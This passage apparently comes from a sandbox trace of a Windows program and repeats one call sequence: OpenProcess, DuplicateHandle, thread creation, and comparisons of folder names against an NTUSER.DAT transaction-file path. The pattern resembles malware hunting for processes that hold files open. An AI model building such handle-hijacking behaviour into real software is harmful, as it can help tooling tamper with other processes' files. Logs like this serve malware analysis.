lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.097] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.097] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.097] CloseHandle (hObject=0x670) returned 1 [0154.097] _wcsicmp (_Str1="\\Reference Assemblies", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 4 [0154.097] CloseHandle (hObject=0x680) returned 1 [0154.097] CloseHandle (hObject=0x62c) returned 1 [0154.097] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7ac) returned 0x62c [0154.097] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.098] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.098] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.099] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.099] CloseHandle (hObject=0x670) returned 1 [0154.099] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.099] CloseHandle (hObject=0x680) returned 1 [0154.099] CloseHandle (hObject=0x62c) returned 1 [0154.099] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7ac) returned 0x62c [0154.099] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.099] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.100] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.102] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.103] CloseHandle (hObject=0x670) returned 1 [0154.103] _wcsicmp (_Str1="\\Common Files", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -11 [0154.103] CloseHandle (hObject=0x680) returned 1 [0154.103] CloseHandle (hObject=0x62c) returned 1 [0154.103] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x774) returned 0x62c [0154.103] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.103] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.104] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.104] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.104] CloseHandle (hObject=0x670) returned 1 [0154.105] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.105] CloseHandle (hObject=0x680) returned 1 [0154.105] CloseHandle (hObject=0x62c) returned 1 [0154.105] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x774) returned 0x62c [0154.105] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.105] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.105] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.106] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.106] CloseHandle (hObject=0x670) returned 1 [0154.106] _wcsicmp (_Str1="\\Windows Portable Devices", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.106] CloseHandle (hObject=0x680) returned 1 [0154.106] CloseHandle (hObject=0x62c) returned 1 [0154.106] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7f4) returned 0x62c [0154.106] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.106] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.107] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.108] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.108] CloseHandle (hObject=0x670) returned 1 [0154.108] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.108] CloseHandle (hObject=0x680) returned 1 [0154.108] CloseHandle (hObject=0x62c) returned 1 [0154.108] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7f4) returned 0x62c [0154.108] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.108] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.109] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.109] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.109] CloseHandle (hObject=0x670) returned 1 [0154.109] _wcsicmp (_Str1="\\Windows Photo Viewer", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.109] CloseHandle (hObject=0x680) returned 1 [0154.109] CloseHandle (hObject=0x62c) returned 1 [0154.109] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7dc) returned 0x62c [0154.110] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.110] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.110] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.111] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.111] CloseHandle (hObject=0x670) returned 1 [0154.111] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.111] CloseHandle (hObject=0x680) returned 1 [0154.111] CloseHandle (hObject=0x62c) returned 1 [0154.111] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7dc) returned 0x62c [0154.112] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.112] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.112] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.113] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.113] CloseHandle (hObject=0x670) returned 1 [0154.113] _wcsicmp (_Str1="\\Microsoft Sync Framework", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0154.113] CloseHandle (hObject=0x680) returned 1 [0154.113] CloseHandle (hObject=0x62c) returned 1 [0154.113] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x5c4) returned 0x62c [0154.113] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.113] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.114] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.115] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.115] CloseHandle (hObject=0x670) returned 1 [0154.115] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.115] CloseHandle (hObject=0x680) returned 1 [0154.115] CloseHandle (hObject=0x62c) returned 1 [0154.115] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x5c4) returned 0x62c [0154.115] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.115] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.116] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.116] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.116] CloseHandle (hObject=0x670) returned 1 [0154.116] _wcsicmp (_Str1="\\Microsoft.NET", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0154.116] CloseHandle (hObject=0x680) returned 1 [0154.117] CloseHandle (hObject=0x62c) returned 1 [0154.117] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x76c) returned 0x62c [0154.117] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.117] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.117] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.118] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.118] CloseHandle (hObject=0x670) returned 1 [0154.118] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.118] CloseHandle (hObject=0x680) returned 1 [0154.118] CloseHandle (hObject=0x62c) returned 1 [0154.118] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x76c) returned 0x62c [0154.118] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.118] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.119] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.120] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.120] CloseHandle (hObject=0x670) returned 1 [0154.120] _wcsicmp (_Str1="\\Windows Portable Devices", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.120] CloseHandle (hObject=0x680) returned 1 [0154.120] CloseHandle (hObject=0x62c) returned 1 [0154.120] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x20c) returned 0x62c [0154.120] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.120] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.121] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.121] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.121] CloseHandle (hObject=0x670) returned 1 [0154.121] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.121] CloseHandle (hObject=0x680) returned 1 [0154.121] CloseHandle (hObject=0x62c) returned 1 [0154.121] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x20c) returned 0x62c [0154.122] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.122] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.122] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.124] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.124] CloseHandle (hObject=0x670) returned 1 [0154.124] _wcsicmp (_Str1="\\Uninstall Information", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 7 [0154.124] CloseHandle (hObject=0x680) returned 1 [0154.124] CloseHandle (hObject=0x62c) returned 1 [0154.124] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x788) returned 0x62c [0154.124] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.124] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.125] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.126] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.126] CloseHandle (hObject=0x670) returned 1 [0154.126] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.126] CloseHandle (hObject=0x680) returned 1 [0154.126] CloseHandle (hObject=0x62c) returned 1 [0154.126] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x788) returned 0x62c [0154.126] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.126] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.127] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.127] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.127] CloseHandle (hObject=0x670) returned 1 [0154.127] _wcsicmp (_Str1="\\Windows Journal", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.127] CloseHandle (hObject=0x680) returned 1 [0154.127] CloseHandle (hObject=0x62c) returned 1 [0154.127] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x348) returned 0x62c [0154.128] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.128] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.128] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.129] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.129] CloseHandle (hObject=0x670) returned 1 [0154.129] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.129] CloseHandle (hObject=0x680) returned 1 [0154.129] CloseHandle (hObject=0x62c) returned 1 [0154.129] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x348) returned 0x62c [0154.129] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.129] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.130] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.131] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.131] CloseHandle (hObject=0x670) returned 1 [0154.131] _wcsicmp (_Str1="\\Google", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -7 [0154.131] CloseHandle (hObject=0x680) returned 1 [0154.131] CloseHandle (hObject=0x62c) returned 1 [0154.131] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x310) returned 0x62c [0154.131] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.131] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.132] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.132] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.132] CloseHandle (hObject=0x670) returned 1 [0154.132] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.132] CloseHandle (hObject=0x680) returned 1 [0154.132] CloseHandle (hObject=0x62c) returned 1 [0154.132] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x310) returned 0x62c [0154.133] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.133] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.133] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.134] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.134] CloseHandle (hObject=0x670) returned 1 [0154.134] _wcsicmp (_Str1="\\Adobe", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0154.134] CloseHandle (hObject=0x680) returned 1 [0154.134] CloseHandle (hObject=0x62c) returned 1 [0154.134] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x48c) returned 0x62c [0154.134] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.134] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.135] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.135] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.135] CloseHandle (hObject=0x670) returned 1 [0154.136] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.136] CloseHandle (hObject=0x680) returned 1 [0154.136] CloseHandle (hObject=0x62c) returned 1 [0154.136] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x48c) returned 0x62c [0154.136] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.136] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.137] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.137] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.137] CloseHandle (hObject=0x670) returned 1 [0154.137] _wcsicmp (_Str1="\\Uninstall Information", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 7 [0154.137] CloseHandle (hObject=0x680) returned 1 [0154.137] CloseHandle (hObject=0x62c) returned 1 [0154.137] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x138) returned 0x62c [0154.137] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.138] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.138] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.140] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.140] CloseHandle (hObject=0x670) returned 1 [0154.140] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.140] CloseHandle (hObject=0x680) returned 1 [0154.140] CloseHandle (hObject=0x62c) returned 1 [0154.140] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x138) returned 0x62c [0154.140] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.140] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.141] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.142] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.142] CloseHandle (hObject=0x670) returned 1 [0154.142] _wcsicmp (_Str1="\\Uninstall Information", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 7 [0154.142] CloseHandle (hObject=0x680) returned 1 [0154.142] CloseHandle (hObject=0x62c) returned 1 [0154.142] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x524) returned 0x62c [0154.142] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.142] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, 